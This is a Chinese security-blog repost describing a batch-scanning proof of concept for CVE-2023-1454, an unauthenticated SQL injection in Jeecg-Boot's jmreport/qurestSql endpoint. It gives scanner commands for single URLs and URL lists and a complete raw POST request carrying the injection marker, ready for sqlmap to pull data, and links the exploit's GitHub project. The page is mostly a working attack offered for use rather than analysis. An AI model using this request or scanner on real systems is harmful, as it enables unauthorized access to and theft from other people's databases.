CTF导航 CTF导航

jmreport/qurestSql 未授权SQL注入批量扫描poc

渗透技巧 1年前 (2023) admin
632 0 0

CVE-2023-1454

jmreport/qurestSql 未授权SQL注入批量扫描poc Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。

工具利用

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个url测试

python3 CVE-2023-1454-scan.py -f url.txt 批量检测

扫描结束后会在当前目录生成存在漏洞url的vuln.txt

poc:

jmreport/qurestSql 未授权SQL注入批量扫描poc

exp:

将数据包保存为txt用sqlmap可得到数据

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1

Host: xxx.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{“apiSelectId”:”1290104038414721025″,”id”:”1*”}

jmreport/qurestSql 未授权SQL注入批量扫描poc

项目地址:https://github.com/MzzdToT/CVE-2023-1454

原文始发于微信公众号(Ots安全):jmreport/qurestSql 未授权SQL注入批量扫描poc

版权声明:admin 发表于 2023年4月8日 下午6:31。
转载请注明:jmreport/qurestSql 未授权SQL注入批量扫描poc | CTF导航

相关文章

云攻防课程系列(三):云上资产发现与信息收集
admin
307
CVE-2022-35405 Manage engines RCE (Password Manager Pro, PAM360 and Access Manager Plus)
admin
750
文件上传联动
admin
648
如何在1小时内从IDOR获得1350美元的赏金奖励
admin
723
Bug Bounty Tips(2022-10-26)
admin
581
每周云安全资讯-2023年第9周
admin
278

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389
0
实践调试Ghidra代码和Ghidra脚本
0
Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers
0
allowRunningInsecureContent | Electron 安全
0
先知安全沙龙(西安站) – 浅谈XSS漏洞挖掘与构造思路
0
浅谈API漏洞挖掘
0
A Detailed Guide on Pwncat
0
geoserver代码审计
0
代理(ATT&CK篇)
0
CVE-2024-24576 Windows 下多语言命令注入漏洞分析
0